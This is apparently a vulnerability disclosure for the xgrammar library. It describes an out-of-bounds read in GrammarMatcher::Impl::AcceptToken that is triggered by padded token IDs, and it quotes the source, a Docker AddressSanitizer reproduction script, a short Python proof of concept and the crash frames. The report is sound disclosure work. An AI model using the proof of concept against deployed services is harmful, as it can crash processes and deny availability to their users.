Out-of-Bounds Read Through Padded Token IDs
Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730
Summary
XGrammar intentionally allows TokenizerInfo.vocab_size to be larger than the supplied encoded vocabulary so a grammar mask can match a model's padded logits. A caller that passes one of those valid declared IDs to GrammarMatcher.accept_token should receive False. Instead, GrammarMatcher::Impl::AcceptToken recognizes the ID as special and formats its rejection warning by indexing the shorter decoded-vocabulary vector, causing an out-of-bounds read and process abort under AddressSanitizer. An integration in which sampled token IDs reach accept_token can therefore lose availability; this report does not establish control-flow hijacking or disclosure of a useful adjacent value.
Detail
The root cause is that TokenizerInfo maintains two related sizes with different meanings, while AcceptToken treats them as interchangeable:
vocab_size_is the declared model vocabulary and is used to validate externally supplied token IDs and size bitmasks.decoded_vocab_.size()is only the number of strings actually supplied and decoded. It may legitimately be smaller thanvocab_size_.- IDs in the gap
[decoded_vocab_.size(), vocab_size_)are padding or reserved IDs. Construction records them inspecial_token_ids_, but does not add placeholder strings todecoded_vocab_.
The constructor in cpp/tokenizer_info.cc creates precisely this valid state. It decodes only encoded_vocab, then marks each remaining declared ID as special:
for (int i = 0; i < static_cast<int>(encoded_vocab.size()); ++i) {
const std::string& token = TokenDecoder::DecodeToken(encoded_vocab[i], vocab_type_);
decoded_vocab_.push_back(token);
if ((!stop_token_ids && DETECTION_STOP_TOKENS.count(token)) ||
(stop_token_ids &&
std::find(stop_token_ids->begin(), stop_token_ids->end(), i) != stop_token_ids->end())) {
stop_token_ids_.push_back(i);
} else if (IsSpecialToken(token)) {
special_token_ids_.push_back(i);
} else {
sorted_decoded_vocab_.push_back({i, token});
}
}
for (int i = encoded_vocab.size(); i < vocab_size_; ++i) {
special_token_ids_.push_back(i);
}
For the PoC, encoded_vocab == ["a"] and vocab_size == 2. Thus the declared valid interval is [0, 2), decoded_vocab_ has only index 0, and special_token_ids_ contains 1.
GrammarMatcher::Impl::AcceptToken in cpp/grammar_matcher.cc first checks the caller's ID against the declared size. Token ID 1 passes that check because it is smaller than GetVocabSize() == 2. The next branch finds 1 in special_token_ids_, but its rejection diagnostic reads GetDecodedVocab()[1]:
if (token_id < 0 || token_id >= tokenizer_info_.GetVocabSize()) {
// reject
return false;
}
const auto& special_token_ids = tokenizer_info_.GetSpecialTokenIds();
if (!is_stop_token && std::find(special_token_ids.begin(), special_token_ids.end(), token_id) !=
special_token_ids.end()) {
XGRAMMAR_LOG(WARNING) << "GrammarMatcher cannot accept special token id " << token_id << ": "
<< tokenizer_info_.GetDecodedVocab()[token_id]
<< ". Rejecting the token.";
return false;
}
The warning's stream insertion must evaluate the std::string before the function can reach return false. std::vector::operator[] performs no runtime bounds check, so the intended rejection path itself becomes the memory-safety sink. AddressSanitizer reports the eventual invalid read in memcpy while the logging stream attempts to emit the bogus string, with GrammarMatcher::Impl::AcceptToken as the first XGrammar frame.
This is not a failure of the initial numeric check: ID 1 is valid in the declared model-ID domain. The missing invariant is that code may dereference decoded_vocab_[token_id] only when token_id < decoded_vocab_.size(). Checking membership in special_token_ids_ does not establish that invariant because the constructor deliberately puts IDs without decoded entries in that list.
History supports an affected range beginning with the earliest public release. Commit a99cb18 introduced the split declared/decoded vocabulary representation before v0.1.0; the matcher already indexed the decoded vector while rejecting a padded special ID in that tag. Later changes converted a fatal rejection into a warning and added normal range checks, but preserved the cross-domain lookup. All release tags through v0.2.6rc2 contain the unsafe access, and the assessed main revision does as well.
Reproduce
Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.
Run the following in a disposable local Docker environment. It checks out the exact assessed revision, builds with AddressSanitizer, and passes padded token ID 1 to a matcher whose declared vocabulary size is 2 but whose decoded vocabulary contains one entry. The compiler-resolved ASan runtime is preloaded during the build because the build's stub-generation process loads the instrumented binding; the final Python process additionally preloads the matching libstdc++ runtime. The container is removed automatically and does not contact an existing service.
docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=1
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi pydantic transformers numpy typing-extensions
mkdir work
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --depth 1 3rdparty/dlpack
asan_runtime="$(g++ -print-file-name=libasan.so)"
stdcxx_runtime="$(g++ -print-file-name=libstdc++.so)"
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
LD_PRELOAD="${asan_runtime}" \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
cat > ../repro.py <<'PY'
import xgrammar as xgr
tokenizer = xgr.TokenizerInfo(["a"], vocab_size=2)
compiled = xgr.GrammarCompiler(
tokenizer, max_threads=1, cache_enabled=False
).compile_grammar('root ::= "a"')
xgr.GrammarMatcher(compiled).accept_token(1)
PY
cd ..
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0:disable_coredump=1 \
LD_PRELOAD="${asan_runtime}:${stdcxx_runtime}" \
python repro.py
DOCKER
The supplied recorded run terminated with a nonzero status and included the following decisive frames (addresses and process IDs vary):
ERROR: AddressSanitizer: unknown-crash
READ of size 404
#3 in xgrammar::GrammarMatcher::Impl::AcceptToken(int, bool) [source path omitted]:1223
SUMMARY: AddressSanitizer: unknown-crash ... in __interceptor_memcpy
Credit
Zheng Yu @ Depthfirst